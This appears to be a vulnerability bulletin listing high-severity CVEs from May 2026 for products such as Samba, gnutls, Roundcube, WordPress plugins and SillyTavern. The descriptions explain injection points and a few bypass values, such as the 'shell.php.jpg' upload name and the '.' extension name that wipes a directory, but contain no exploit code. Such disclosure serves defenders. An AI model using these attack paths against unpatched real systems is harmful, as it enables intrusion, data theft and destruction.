| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba. A remote attacker can exploit a misconfiguration in Samba file servers and classic domain controllers that use the "check password script" feature. If this script is configured with the %u substitution character, the client-controlled username is passed without proper escaping of shell meta-characters. This vulnerability allows an attacker to achieve remote command execution on the affected system. This issue primarily affects non-standard configurations where the "check password script" is used with %u and the samba-dcerpcd service is started as a system service. | 2026-05-28 | 9 | CVE-2026-4408 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's certificate auto-enrollment Group Policy handling. When certificate auto-enrollment is enabled, Samba may retrieve a CA certificate over an unencrypted HTTP connection and install it into the local trust store without proper verification. An attacker with the ability to intercept or redirect network traffic could exploit this behavior to supply a malicious certificate authority certificate, potentially allowing interception or spoofing of trusted communications. | 2026-05-27 | 8 | CVE-2026-3012 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the Samba printing subsystem. Samba passes the client-controlled job description string to the command configured with the "print command" setting via the "%J" substitution character without escaping shell meta characters. A remote attacker could exploit this vulnerability by sending a specially crafted print job description that contains unescaped shell characters. This could lead to remote code execution on the affected system. | 2026-05-26 | 8.5 | CVE-2026-4480 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's handling of NTFS-style reparse points on shares configured with read only = yes. Due to missing SMB-layer access checks, authenticated users with underlying filesystem write permissions may create or delete reparse point metadata through SMB operations even on read-only exports. This could allow modification of SMB-visible file behavior, including converting files into symbolic links or other reparse point types. | 2026-05-27 | 7.1 | CVE-2026-1933 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in gnutls. When validating certificates, an oversized Subject Alternative Name (SAN) could cause the validation process to incorrectly fall back to checking the Common Name (CN) field. This could allow a remote attacker to bypass proper certificate validation, potentially leading to spoofing or man-in-the-middle attacks. | 2026-05-26 | 8.2 | CVE-2026-42013 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in libgnutls. A remote attacker, by sending an extremely short premaster secret during an RSA key exchange to a server using an RSA key backed by a PKCS#11 token, could trigger a short heap overread. This memory corruption vulnerability could lead to information disclosure. | 2026-05-26 | 8.2 | CVE-2026-5260 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted certificate that contains Uniform Resource Identifier (URI) or Service (SRV) Subject Alternative Names (SANs). This could cause the certificate validation process to incorrectly fall back to checking DNS hostnames against the Common Name (CN), potentially allowing the attacker to spoof legitimate services or intercept sensitive information. | 2026-05-26 | 7.1 | CVE-2026-42012 |
| Red Hat--Red Hat Hardened Images | A flaw was found in libsolv. This heap buffer overflow occurs during the decompression of attacker-controlled compressed data within `.solv` files due to insufficient input validation. An attacker can provide a specially crafted `.solv` file, which, when processed by a vulnerable application, can lead to out-of-bounds memory access. This could result in information disclosure, alteration of program execution, or a denial of service. | 2026-05-26 | 7.8 | CVE-2026-48864 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in the OpenShift Router. A user with EndpointSlice write access can exploit this vulnerability by creating a Service backed by an FQDN (Fully Qualified Domain Name) EndpointSlice that resolves to a cloud metadata endpoint. This allows the router to proxy requests to the cloud metadata endpoint, leading to the disclosure of instance credentials and other sensitive metadata. This bypasses previous security measures for validating IP addresses. | 2026-05-29 | 7.7 | CVE-2026-42965 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in the OpenShift Router. When a Route has `insecureEdgeTerminationPolicy` set to Allow, the HTTP frontend does not remove `X-SSL-Client-*` headers from incoming requests. This allows an unauthenticated attacker to send plain HTTP requests with crafted `X-SSL-Client-*` headers. As a result, backends relying on these headers for mutual TLS (Transport Layer Security) authentication can be bypassed, enabling the attacker to impersonate client certificate identities. | 2026-05-29 | 7.4 | CVE-2026-46579 |
| Red Hat--Red Hat OpenShift Virtualization 4 | A flaw was found in KubeVirt's virt-exportserver component. An attacker with specific namespace-level access can exploit a path traversal vulnerability in the VMExport directory endpoint. By placing a symbolic link (symlink) within an exported filesystem Persistent Volume Claim (PVC) that points outside its designated mount root, the attacker can read arbitrary files from the exporter pod's filesystem. This leads to information disclosure, potentially exposing sensitive data. | 2026-05-28 | 7.7 | CVE-2026-9804 |
| revmakx--Backup and Staging by WP Time Capsule | Authentication Bypass Using an Alternate Path or Channel vulnerability in revmakx Backup and Staging by WP Time Capsule wp-time-capsule allows Password Recovery Exploitation.This issue affects Backup and Staging by WP Time Capsule: from n/a through <= 1.22.25. | 2026-05-27 | 7.5 | CVE-2026-42760 |
| RiceTheme--Felan Framework | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RiceTheme Felan Framework allows Reflected XSS. This issue affects Felan Framework: from n/a through 1.1.3. | 2026-05-27 | 7.1 | CVE-2025-22741 |
| riebl--vanetza | Vanetza is an open-source implementation of the ETSI C-ITS protocol suite. In 26.02 and earlier, a denial-of-service vulnerability was identified in the ASN.1/OER parsing pipeline of Vanetza. When processing malformed network packets containing corrupted ASN.1/OER structures (e.g., invalid length fields or malformed certificate encoding), the ASN.1 wrapper (asn1c_wrapper.cpp) raises a std::runtime_error. This exception is not caught at the parsing boundary and propagates to std::terminate, resulting in process termination. This vulnerability is fixed with commit 62dfe58a8342512b6e1947d75821402ada524f1a. | 2026-05-26 | 7.5 | CVE-2026-43988 |
| riebl--vanetza | Vanetza is an open-source implementation of the ETSI C-ITS protocol suite. In 26.02 and earlier, a denial-of-service vulnerability was identified in the cryptographic verification pipeline of Vanetza. When processing incoming V2X messages, the ASN.1 decoder accepts the structure as syntactically valid. However, this reveals a logic-based protocol failure where semantic constraints on specific fields are only strictly enforced during OER re-encoding. Specifically, if a crafted packet contains a certificate where the Psid (Provider Service Identifier) sub-type violates subtype constraints (e.g., out-of-range or invalid CHOICE variant), it is accepted during initial parsing, where subtype constraints are not enforced. Later, when StraightVerifyService attempts to calculate a message hash for cryptographic verification, it must re-encode the signing certificate. The underlying ASN.1 wrapper (asn1c_wrapper.cpp) detects the semantic violation during encoding and raises a std::runtime_error. This exception is not caught within the encoding path and propagates to std::terminate, resulting in immediate process termination. This vulnerability is fixed with commit e1a2e2709210d309458c3d77f98d50dec26c0df0. | 2026-05-26 | 7.5 | CVE-2026-44905 |
| robertpeake--Login No Captcha reCAPTCHA | The Login No Captcha reCAPTCHA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `$_SERVER['PHP_SELF']` superglobal in all versions up to, and including, 1.8.0. This is due to the `authenticate()` function storing the unsanitized output of `basename($_SERVER['PHP_SELF'])` in the `login_nocaptcha_error` WordPress option when a login attempt is made from a non-standard login page (e.g., xmlrpc.php). The `admin_notices()` function then echoes this stored value directly into the admin dashboard HTML without escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when an administrator with a whitelisted IP address visits the WordPress dashboard within 30 seconds of the attack. | 2026-05-28 | 7.2 | CVE-2026-2374 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1 has Pre-authentication SQL injection in the virtuser_query plugin via a preg_replace() backslash escape bypass. | 2026-05-25 | 8.1 | CVE-2026-48842 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x between 1.6.14 and 1.6.16,and 1.7.x before 1.7.1 has Insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages may lead to SSRF or Information Disclosure, e.g., if stylesheet links point to local network hosts. The issue stems from an insufficient fix for CVE-2026-35540. | 2026-05-25 | 7.2 | CVE-2026-48843 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1 has insecure code evaluation logic in LDAP the autovalues option that could lead to code injection. (Support for code evaluation has been removed in 1.6.16 and 1.7.1.) | 2026-05-25 | 7.5 | CVE-2026-48844 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7 has insufficient HTML sanitization that could lead to Cascading Style Sheets (CSS) injection via an SVG document that has an animate element with the attributeName attribute. | 2026-05-25 | 7.2 | CVE-2026-48848 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, the internode RPC layer authenticates every request with an HMAC-SHA256 signature using a shared secret. The function that produces this secret, get_shared_secret() in crates/ecstore/src/rpc/http_auth.rs, falls back to the public, source-tree-embedded DEFAULT_SECRET_KEY = "rustfsadmin" when neither the RUSTFS_RPC_SECRET environment variable nor the global S3 secret key has been configured. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | 9.8 | CVE-2026-45039 |
| Saleswonder Team: Tobias--WebinarIgnition | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Path Traversal.This issue affects WebinarIgnition: from n/a through < 4.08.253. | 2026-05-27 | 9.9 | CVE-2026-42757 |
| Saleswonder Team: Tobias--WebinarIgnition | Incorrect Privilege Assignment vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Privilege Escalation.This issue affects WebinarIgnition: from n/a through < 4.08.253. | 2026-05-27 | 9.8 | CVE-2026-42758 |
| sambitraj--STUDENT-MANAGEMENT-SYSTEM | A flaw has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM 1.0. This impacts an unknown function of the component Login Page. Executing a manipulation of the argument email can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 7.3 | CVE-2026-10111 |
| sambitraj--STUDENT-MANAGEMENT-SYSTEM | A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM up to 56ba287f2e9031523ccb4244cb6e3fe530e4e5d5. The affected element is an unknown function of the component Dashboard. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 7.3 | CVE-2026-9562 |
| Samsung Open Source--Escargot | Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 36f5fb58366a67b713c02f6fd985e924fcc09e31. | 2026-05-28 | 8.8 | CVE-2026-8915 |
| sbthemes--WooCommerce Infinite Scroll and Ajax Pagination | The WooCommerce Infinite Scroll and Ajax Pagination plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.8 via the 'settings' parameter in the 'import_settings' function. This is due to deserialization of untrusted data supplied via the import configuration feature without capability checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No POP chain is present within the vulnerable plugin itself, but if a POP chain is present via an additional plugin or theme installed on the target system, it could allow an attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2026-05-29 | 8.8 | CVE-2025-11993 |
| ScadaBR--ScadaBR | Exposed methods allow authenticated users to create and execute arbitrary JavaScript code on the server. The scripts execute with full access, enabling complete system compromise as commands are executed as root. | 2026-05-28 | 9.9 | CVE-2026-9645 |
| SDMC Technology Co., Ltd--NE6037 | SDMC NE6037 cable modem routers running firmware 7.1.6.0.25 and 7.1.6.1.9_B9 contain a hardcoded password vulnerability in the web management interface recovery endpoints (mgmt.php, npcmd.php) that allows unauthenticated attackers to gain root access by submitting the hardcoded credential to the recovery endpoint via HTTP. Attackers can leverage this hardcoded password to enable filtered SSH and Telnet services on the device, resulting in unauthenticated root-level remote access to the underlying system. | 2026-05-28 | 9.8 | CVE-2026-24444 |
| sebhildebrandt--systeminformation | systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6. | 2026-05-27 | 7.8 | CVE-2026-44724 |
| SeedProd LLC--SeedProd Pro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in SeedProd LLC SeedProd Pro allows PHP Local File Inclusion. This issue affects SeedProd Pro: from n/a before 6.19.5. | 2026-05-27 | 7.5 | CVE-2026-48972 |
| servo--smallbitvec | smallbitvec is a growable bit-vector for Rust, optimized for size. From 1.0.1 to 2.6.0, an integer overflow in the internal capacity calculation of smallbitvec can lead to an undersized heap allocation, resulting in a heap buffer overflow through safe APIs only. This allows memory corruption without requiring unsafe code from the caller. This vulnerability is fixed in 2.6.1. | 2026-05-26 | 7.3 | CVE-2026-44983 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to and including 3.29.2. This is due to insecure form submission handling that accepts arbitrary form definitions from user input instead of securely loading them from the backend. When $_POST['_acf_form'] is an array (rather than a form ID), the validate_form() function bypasses database lookup and directly processes the attacker-controlled structure. The create_record() function preserves attacker-supplied record data if present, and the user action's run() function falls back to attacker-controlled field definitions from $form['fields'] when legitimate fields cannot be found. The role field's pre_update_value() validation reads $field['role_options'] from this attacker-controlled definition, allowing an attacker to specify ['administrator'] as an allowed role and bypass the security check. This makes it possible for unauthenticated attackers to create administrator accounts by injecting a custom form configuration with a spoofed role field. | 2026-05-28 | 8.8 | CVE-2026-6226 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.29.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite an administrator's user_pass, user_email, first_name, last_name, and other profile fields by supplying an arbitrary ?user_id= value, enabling full administrator account takeover via direct password replacement or email-redirect password reset. Exploitation requires the targeted Edit-User form to have its 'Roles' configuration setting left empty; when a non-empty roles list is configured, load_data() sets the user ID to 'none' for users whose roles fall outside the allowed list, preventing administrators from being targeted through that form. | 2026-05-28 | 8.8 | CVE-2026-7802 |
| shazdeh--Query Shortcode | The Query Shortcode plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.2.1 via the shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-05-27 | 7.5 | CVE-2026-9200 |
| Shenzhen Sixun Software--Sixun Shanghui Group Business Management System | A vulnerability was found in Shenzhen Sixun Software Sixun Shanghui Group Business Management System 10. Affected by this vulnerability is an unknown functionality of the file /api/Dinner/PayConfig. Performing a manipulation of the argument tableno results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9544 |
| shepherdwind--velocity.js | Velocity.js is a JavaScript implementation of the Apache Velocity template engine. In 2.1.5 and earlier, a prototype pollution vulnerability was discovered in velocityjs. This issue occurs during the processing of #set directives in Velocity templates. If an application renders a template controlled by an attacker, it is possible to modify Object.prototype, potentially leading to Denial of Service (DoS) or Remote Code Execution (RCE) depending on the server environment. | 2026-05-26 | 8.3 | CVE-2026-44966 |
| sherlock-project--sherlock | Sherlock hunts down social media accounts by username across social networks. Prior to 0.16.1, the GitHub Actions workflow validate_modified_targets.yml is vulnerable to command injection via the pull_request_target trigger. Any GitHub user can execute arbitrary commands on the CI runner and exfiltrate the GITHUB_TOKEN by opening a pull request. No approval, review, or merge is required. This vulnerability is fixed in 0.16.1. | 2026-05-27 | 9.3 | CVE-2026-44590 |
| Shibby--Tomato | A weakness has been identified in Shibby Tomato 1.28. This vulnerability affects the function get_ups_field of the file tomatodata.cgi. Executing a manipulation of the argument Date can lead to stack-based buffer overflow. It is possible to launch the attack remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10065 |
| Shibby--Tomato | A security vulnerability has been detected in Shibby Tomato up to 1.28. This issue affects the function sub_9068 of the file tomatoups.cgi of the component UPS Service. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10066 |
| Shibby--Tomato | A vulnerability was detected in Shibby Tomato 1.28. Impacted is the function sub_90F0 of the file multimon.cgi. The manipulation results in stack-based buffer overflow. The attack can be launched remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10067 |
| Shibby--Tomato | A vulnerability was determined in Shibby Tomato up to 1.28. Affected is the function rip_zebra_read_ipv4 of the file /usr/sbin/ripd of the component Zserv Handler. Executing a manipulation can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10124 |
| Shibby--Tomato | A flaw has been found in Shibby Tomato 1.28. The affected element is the function send of the file usr/sbin/miniupnpd of the component SUBSCRIBE Call Handler. This manipulation causes server-side request forgery. The attack may be initiated remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 7.3 | CVE-2026-10068 |
| Shibby--Tomato | A vulnerability has been found in Shibby Tomato 1.28. The impacted element is an unknown function of the file usr/sbin/miniupnpd. Such manipulation leads to resource consumption. The attack may be launched remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 7.5 | CVE-2026-10069 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, two distinct authorization defects in the team settings allowed any authenticated panel user to take over the RBAC system. Settings/Team/Index had no mount() authorization. Any authenticated user could load the page and use its public actions to create new roles and delete other users, including administrators. Settings/Team/RolePermission gated its write actions on the read-only view_users permission. Any user holding view_users could grant themselves or any other user arbitrary permissions, including manage_users and edit_orders, effectively escalating to full panel administrator from a read-only account. Combined, these two defects allow a low-privilege authenticated user to obtain administrator privileges and remove the legitimate administrators from the panel. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 9.9 | CVE-2026-47744 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, Multiple Filament actions on the admin Order detail and Order shipments table were callable by an authenticated low-privilege user without the permission required to mutate orders. The order detail actions cancel, mark paid, mark complete, capture payment, archive, and start processing were callable with the read-only read_orders permission and did not require edit_orders. capturePayment could trigger an actual PSP capture (real funds movement). The order shipments table actions mark delivered and edit tracking were callable with the read-only browse_orders permission. A user with read access to orders could therefore alter the lifecycle of every order in the panel and trigger real-world payment captures. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 8.1 | CVE-2026-47740 |
| silabs.com--Simplicity SDK | An attacker is able to downgrade the security of a Bluetooth LE connection by deleting an existing bond, spoofing the bonded device and creating a new bond. | 2026-05-26 | 8.8 | CVE-2026-8676 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, SillyTavern accepts Remote-User (Authelia) and X-Authentik-Username (Authentik) HTTP headers to automatically log in users when SSO is configured. There is no validation that these headers originate from a trusted reverse proxy. Any network client that can reach the SillyTavern port directly can inject these headers and authenticate as any user, including administrators, without a password. This vulnerability is exploitable only when sso.autheliaAuth: true or sso.authentikAuth: true is set in config.yaml (both default to false). This vulnerability is fixed in 1.18.0. | 2026-05-29 | 9.8 | CVE-2026-44649 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, POST /api/extensions/delete endpoint accepts extensionName: "." which bypasses sanitize-filename validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. This vulnerability is fixed in 1.18.0. | 2026-05-29 | 9.1 | CVE-2026-44650 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, SillyTavern exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body. This vulnerability is fixed in 1.18.0. | 2026-05-29 | 8.5 | CVE-2026-46372 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, SillyTavern relies on cookie-session for authentication, storing all session data (user handle, permissions) in a signed cookie. The endpoints POST /api/users/change-password and POST /api/users/recover-step2 only update the password hash in the database but do not expire current sessions. Because the session is stateless and stored entirely in the client cookie, there is no server-side mechanism to revoke a token once issued. This vulnerability is fixed in 1.18.0. | 2026-05-29 | 7.5 | CVE-2026-44648 |
| Simpkh--SIM-PKH | SIM-PKH 2.4.1 contains an arbitrary file upload vulnerability that allows authenticated attackers to upload malicious files by submitting PHP code through the fupload parameter. Attackers can upload PHP files via the aksi_pengurus.php endpoint with module=pengurus and act=update parameters, which are stored in the foto directory and executed as web scripts. | 2026-05-30 | 8.8 | CVE-2018-25409 |
| Simpkh--SIM-PKH | SIM-PKH 2.4.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to /admin/media.php with module=pengurus and act=editpengurus parameters containing SQL UNION statements to extract database information including usernames, database names, and version details. | 2026-05-30 | 7.1 | CVE-2018-25410 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains multiple SQL injection vulnerabilities in admin/media.php that allow attackers to manipulate database queries by injecting SQL code through the 'id' parameter. An unauthenticated attacker can exploit the desa module (module=desa&act=hapus), while authenticated users can exploit the pengurus, fasilitas, and kelompok modules (for example act=print, act=editpengurus, act=editfasilitas, and act=editkelompok). Successful exploitation allows extraction of sensitive database information including the current user, database name, and DBMS version. | 2026-05-29 | 8.2 | CVE-2018-25386 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains an arbitrary file upload vulnerability that allows authenticated attackers to upload malicious files by bypassing file type validation. Attackers can upload PHP files through multiple endpoints including aksi_foto.php, aksi_user.php, and aksi_kecamatan.php to execute arbitrary code on the server. | 2026-05-29 | 8.8 | CVE-2018-25388 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'nama_kelompok' POST parameter sent to lap-anggota-kelompok-pdf.php. Attackers can send a crafted request with a time-based blind payload to infer and extract sensitive database information. | 2026-05-29 | 8.2 | CVE-2018-25389 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'desa' POST parameter sent to lap-peserta-perdesa-pdf.php. Attackers can send a crafted request with a time-based blind payload to infer and extract sensitive database information. | 2026-05-29 | 8.2 | CVE-2018-25390 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 fails to enforce authorization on its record deletion endpoints, allowing unauthenticated attackers to delete arbitrary records by sending a crafted request that specifies the target record's id. The admin/modul/mod_pengurus/aksi_pengurus.php (module=pengurus&act=hapus) and admin/modul/mod_update/aksi_update.php (module=update&act=hapus) endpoints process deletions without verifying the requester's privileges, enabling removal of pengurus (administrator) and update records. | 2026-05-29 | 7.5 | CVE-2018-25391 |
| smub--WPCode Insert Headers and Footers + Custom Code Snippets WordPress Code Manager | The WPCode - Insert Headers and Footers + Custom Code Snippets - WordPress Code Manager plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.3.5 This is due to the 'wpcode' custom post type being registered without a custom capability_type or capability restrictions in the wpcode_register_post_type() function, allowing WordPress core to fall back to standard post capabilities for all creation paths including XML-RPC. This makes it possible for authenticated attackers, with author-level access and above, to create and publish executable PHP snippet posts via XML-RPC wp.newPost, which are then executed server-side via eval() in the run_eval() function when the snippet is rendered through the [wpcode] shortcode. | 2026-05-27 | 8.8 | CVE-2026-8832 |
| SocuSoft--3GP Photo Slideshow | Socusoft 3GP Photo Slideshow 8.05 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft malicious input in the Registration Name and Registration Key fields to overwrite the SEH chain and execute shellcode for reverse shell access. | 2026-05-25 | 8.4 | CVE-2018-25376 |
| SocuSoft--DVD Photo Slideshow Professional | SocuSoft DVD Photo Slideshow Professional 8.07 contains a stack-based buffer overflow vulnerability in the registration name field that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious text file with carefully constructed payload containing junk bytes, SEH chain overwrite, and shellcode, then paste the contents into the Registration Name field via Help > Register to trigger code execution. | 2026-05-25 | 8.4 | CVE-2018-25373 |
| SocuSoft--Flash Slideshow Maker Professional | Flash Slideshow Maker Professional 5.20 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious payload and paste it into the Name and Code fields of the Help > Register dialog to trigger a reverse shell with system privileges. | 2026-05-25 | 8.4 | CVE-2018-25377 |
| SocuSoft--iPod Photo Slideshow | SocuSoft iPod Photo Slideshow 8.05 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by overwriting the structured exception handler. Attackers can craft malicious input in the Registration Name and Registration Key fields to trigger a stack-based buffer overflow and execute a reverse shell payload. | 2026-05-25 | 8.4 | CVE-2018-25375 |
| Softneta--MedDream PACS Server Premium | Softneta MedDream PACS Server Premium 6.7.1.1 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the path parameter. Attackers can send requests to nocache.php with encoded backslash sequences to traverse directories and access sensitive files including system configuration and password files. | 2026-05-25 | 7.5 | CVE-2018-25374 |
| solana-foundation--anchor | Anchor is a framework providing several convenient developer tools for writing Solana programs. From 1.0.0 to before 1.0.2, an logic error causes anchor programs to accept any program id when requiring the system program id, causing false assumptions resulting in potential arbitrary cpi in programs that invoke system program instructions. In the TryFrom<&'a AccountInfo<'a>> implementation for Program<'a, T>, the id of T is compared with Pubkey::default() to check whether anchor should allow any executable account, or a specific account, because when no T is supplied, T defaults to (), which implements Id::id() by returning Pubkey::default(). This results in T = () and T = System (which has Pubkey::default() as the id) having the same behavior, both allow any executable account. Programs built with anchor assume that the anchor runtime verifies passed in programs of type Program<'a, System> are in fact the system program. This false assumption can lead to arbitrary CPI or payment bypassing when programs try making CPI calls to the system program using the passed in system program due to the fact that the attacker can pass in any program instead of the system program. This vulnerability is fixed in 1.0.2. | 2026-05-27 | 8.2 | CVE-2026-45137 |
| SourceCodester--Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. This impacts an unknown function of the file /classes/Users.php?f=delete. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-31 | 7.3 | CVE-2026-10184 |
| SourceCodester--Hospitals Patient Records Management System | A weakness has been identified in SourceCodester Hospitals Patient Records Management System 1.0. Affected is an unknown function of the file /classes/Users.php?f=save. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-05-31 | 7.3 | CVE-2026-10185 |
| SourceCodester--Simple POS and Inventory System | A vulnerability was found in SourceCodester Simple POS and Inventory System 1.0. The impacted element is an unknown function of the file /user/search.php. Performing a manipulation of the argument Name results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-05-25 | 7.3 | CVE-2026-9447 |
| spatie--laravel-medialibrary | Spatie Laravel Media Library before version 11.23.0 contains a file upload restriction bypass in FileAdder::defaultSanitizer(). The sanitizer checks only the final filename suffix, allowing double-extension filenames such as shell.php.jpg to bypass the blocklist, with pathinfo() preserving inner .php stems in saved filenames. The blocklist also omits executable extensions including .php6, .shtml, and .htaccess. The double-extension bypass requires a legacy Apache AddHandler configuration to achieve PHP execution; the incomplete blocklist bypass does not. | 2026-05-29 | 8.8 | CVE-2026-48557 |
| spatie--laravel-medialibrary | Spatie Laravel Media Library before version 11.23.0 contains a server-side request forgery vulnerability that allows remote attackers to cause the server to issue arbitrary outbound HTTP requests by passing user-controlled URLs to the addMediaFromUrl() method in InteractsWithMedia.php. | 2026-05-29 | 7.4 | CVE-2026-48555 |
| spider312--MOGG web simulator Script | MOGG web simulator Script contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL commands by injecting malicious code through the id parameter. Attackers can send GET requests to play.php with crafted SQL payloads in the id parameter to extract sensitive database information including usernames and other data. | 2026-05-30 | 8.2 | CVE-2018-25422 |
| Splinterware--Splinterware System Scheduler Pro | Splinterware System Scheduler Pro 5.12 contains an insecure file permissions vulnerability that allows low-privilege users to escalate privileges by modifying service executable files. Attackers can rename the WService.exe file in the installation directory and replace it with a malicious executable that executes with LocalSystem privileges when the service is triggered. | 2026-05-25 | 8.4 | CVE-2018-25359 |
| spring-ai-community--mcp-security | mcp-security provides Security and Authorization support for Model Context Protocol in Spring AI. Prior to 0.1.9, the mcp-security framework fails to implement the mandatory SSRF mitigations outlined in the Model Context Protocol (MCP) security specifications. Specifically, it processes untrusted URLs for OAuth-related discovery and metadata without verifying if the targets are malicious or internal to the network. This only affects installations with Dynamic Client Registration (DCR) enabled This vulnerability is fixed in 0.1.9. | 2026-05-29 | 7.2 | CVE-2026-45609 |
| StoreApps--Smart Manager | Incorrect Privilege Assignment vulnerability in StoreApps Smart Manager allows Privilege Escalation. This issue affects Smart Manager: from n/a through 8.85.0. | 2026-05-25 | 8.8 | CVE-2026-45216 |
